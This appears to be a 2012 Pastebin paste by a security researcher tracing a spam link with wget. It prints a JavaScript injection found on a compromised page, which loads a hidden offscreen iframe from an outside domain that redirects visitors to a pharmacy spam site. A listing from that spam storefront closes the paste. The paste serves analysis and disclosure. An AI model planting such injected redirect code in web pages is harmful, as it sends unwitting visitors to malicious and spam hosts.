Advertisement
unixfreaxjp

Pseudo DNS/A w/injected code (NEW) & tor blocker(NEW)

Sep 20th, 2012
162
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.  
  2. // following spam link....
  3.  
  4. --15:21:04-- http://192.220.87.172/
  5. => `index.html'
  6. Connecting to 192.168.7.11:8118... connected.
  7. Proxy request sent, awaiting response... 200 OK
  8. Length: 1,038 (1.0K) [text/html]
  9. 15:21:05 (10.21 KB/s) - `index.html' saved [1038/1038]
  10.  
  11. // ↑contains...INJECTED code ↓
  12. :
  13. <!--c3284d--><script type="text/javascript">
  14. function frmAdd() {
  15. var ifrm = document.createElement('iframe');
  16. ifrm.style.position='absolute';
  17. ifrm.style.top='-999em';
  18. ifrm.style.left='-999em';
  19. ifrm.src = "http://wydybpuv.ru/count27.php";
  20. ifrm.id = 'frmId';
  21. document.body.appendChild(ifrm);
  22. };
  23. window.onload = frmAdd;
  24. </script><!--/c3284d-->
  25.  
  26.  
  27. // following the links.. is the pseudo a/dns record redirector
  28. domain, let's see where it goes..↓
  29.  
  30. --15:23:16-- http://wydybpuv.ru/count27.php
  31. => `count27.php'
  32. Connecting to 192.168.7.11:8118... connected.
  33. Proxy request sent, awaiting response... 200
  34. Length: 142 []
  35. Last-modified header invalid -- time-stamp ignored.
  36. 15:23:17 (494.72 B/s) - `count27.php' saved [142/142]
  37.  
  38. //↑contains↓
  39.  
  40. <!DOCTYPE HTML><html><head><script type="text/javascript">parent.location.href = "http://goherdscan.com/";</script></head><body></body></html>
  41.  
  42.  
  43. // following the links..
  44.  
  45. --15:24:46-- http://goherdscan.com   // tor conns take 1 ... fail..
  46. => `index.html.1'
  47. Connecting to 192.168.7.11:8118... connected.
  48. Proxy request sent, awaiting response... ^C
  49. C:\Program Files\GnuWin32\bin\dump>
  50.  
  51.  
  52. --15:25:33-- http://goherdscan.com/   // tor conns take 2 ... fail..
  53. => `index.html.1'
  54. Connecting to 192.168.7.11:8118... connected.
  55. Proxy request sent, awaiting response... ^C
  56.  
  57.  
  58. --15:26:00-- http://goherdscan.com/ // wtf.. get rid of the tor, use bouncer...
  59. => `index.html.1'
  60. Resolving goherdscan.com... 94.23.242.200
  61. Connecting to goherdscan.com|94.23.242.200|:80... connected.
  62. HTTP request sent, awaiting response... 200 OK
  63. Length: unspecified [text/html]
  64. 15:26:02 (56.32 KB/s) - `index.html.1' saved [54634]
  65.  
  66. // ending up with the adult pharma spam sites, below lynx snipped..
  67.  
  68. My Canadian Pharmacy - Canadian Quality Medications at Affordable Price (p1 of 4)
  69. My Canadian Pharmacy
  70. USD GBP CAD EUR AUD CHF
  71. [search_button.gif]-Submit Enter product name_______
  72. * Men's Health
  73. + Viagra bestseller
  74. + Cialis bestseller
  75. + Viagra Super Active+ bestseller
  76. + Levitra bestseller
  77. + Viagra Professional bestseller
  78. + Viagra Super Force bestseller
  79. + Cialis Super Active+ bestseller
  80. + Cialis Professional bestseller
  81. + Cialis Soft Tabs bestseller
  82. + Viagra Soft Tabs bestseller
  83. + Propecia bestseller
  84. + Super Active ED Pack
  85. + VPXL
  86. + Maxaman bestseller
  87. + View all products
  88. * Pain Relief
Advertisement
RAW Paste Data Copied
Advertisement